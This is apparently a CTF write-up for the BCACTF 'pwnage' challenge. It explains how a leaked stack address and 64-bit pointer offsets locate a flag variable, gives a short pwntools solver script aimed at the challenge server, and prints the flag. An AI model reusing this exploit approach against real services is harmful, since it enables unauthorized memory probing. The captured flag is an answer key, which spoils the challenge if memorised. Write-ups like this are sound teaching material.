binex/pwnage

By awt. 190 Solves (100 Points).

Description

It's either a bug, a hack, an exploit, or it's pwnage.

Let this challenge stand as one of the first of many stairs to mastery over that which can only be described as pwn.

Hints

  • Connect using nc aka Netcat

Summary

The challange will printed out the current stack frame address. In this challangge our job is to give the program the right address of variable flag. In the end of the program, the program will print out the value of the address i inputted before. Now, based on the current stack frame address, I can see that the program is running on a 64-bit architecture. This means each memory address occupies 8 bytes. All I need to do is calculate the address of the current stack frame and add the appropriate offset until I reach the address of the flag variable.

Solutions

The challange has given a not completed source code written in C Language.

1KB
provided.c
Open
Provided Source Code Written in C Language

Upon analyzing the code, i learned that the program will print out the current stack frame address and it will ask user to input the address of flag variable.

Current Stack Frame Address

From picture above, i know that the program will get the address of first_var then moves two position back from first_var's address on the stack. Now the problem is we don't know for sure what machine architecture is running the program. In this case the difference of the architecture can be seen from the length of the address. Typically machine with 64 bit architecure have longer address than the 32 bit architecture. Here i will try to use netcat and see what the program actually do.

Stack Frame Address given from the program.

Here, the address's length is kind of longer than the 32 bit machine architecture. Now my assumption is that the running machine is using 64 bit machine. Now the next problem is in each address how much bytes there is ?

Upon researching i fount this reddit article. There is a user explaining about the bytes needed to occupied all of the memory.

Reddit user answer

Now i just needed to sum up the stack frame address until it reaches the address of flag. I knew that the stack frame address is gained from moving 2 steps back from the first_var's address. Now i need to move 2 steps so i get the address of first_var.

Illustration of the stack

Here to gain the first_var address i need to sum the current stack frame address by 16 bytes. Now based on the code all the variable is a pointer which means it will point to some address and also we knew that in 64 bit architecture machine i need 8 bytes to address all of the memory. so to gain the flag address i need to sum the first_var address by 16 more bytes. This way the resultant will be the address of flag variable.

Illustration of the stack

By this assumption to automate all of the process, i have made a solver script written in Python.

pwnage-solver.py
from pwn import *

p = remote("challs.bcactf.com", "30810")
p.recvuntil(b"in is")
stack_frame_address = int(p.recvline().strip(), 16)
first_var_address = stack_frame_address + (8*2)
flag_address = first_var_address + (8*2)
p.recvuntil(b"guess> ")
p.sendline(hex(flag_address).encode())
print(p.recvall())
```

Flag

bcactf{0nE_two_thR3E_f0ur_567___sT3ps_t0_PwN4G3_70cc0e5edd6ea}

Previousbinex/canary-keeper

Last updated